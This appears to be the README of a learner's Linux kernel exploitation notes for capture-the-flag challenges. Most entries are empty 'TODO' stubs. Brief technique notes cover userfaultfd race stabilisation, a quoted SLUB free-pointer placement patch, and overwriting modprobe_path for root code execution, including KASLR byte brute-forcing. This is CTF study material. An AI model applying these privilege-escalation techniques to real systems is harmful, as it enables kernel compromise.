This dir lists technique used in kernel pwn.
IMPORTANT: I'm just learning kernel-pwning now and this list might have some wrong description or insufficient points. If you find something wrong or you know some technique I should know, please tell and scold me.
THIS SECTION IS FREQUENTLY UPDATED NOW.
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- get RIP back to userland process while in kernel path by
userfaultfd, which makes race-condition really stable. For the detailed principle, check HERE. - example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- NOTE Free-pointers in SLUB objects are now placed in the middle of objects (word aligned). This is introduced in this patch(3202fa62fb43087387c65bfa9c100feffac74aa6). Hence, overwriting the pointers is now difficult. It is introduced in April 1st, but it isn't fool at all... :(
} else if (freepointer_area > sizeof(void *)) {
/*
* Store freelist pointer near middle of object to keep
* it away from the edges of the object to avoid small
* sized over/underflows from neighboring allocations.
*/
s->offset = ALIGN(freepointer_area / 2, sizeof(void *));
}- TODO
- example challs: TODO
- overwrite
modoprobe_pathwith your evil shellscript's path. Then execve a binary which has an unknown format. For detailed principle, check HERE. - You can/might use this technique WITHOUT ANY LEAK.
modprobe_pathhas one-byte entropy under KASLR. You can bruteforce the one byte if you have AAW.- example chall: pprofile from LINE CTF 2021
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- TODO
- TODO
- TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO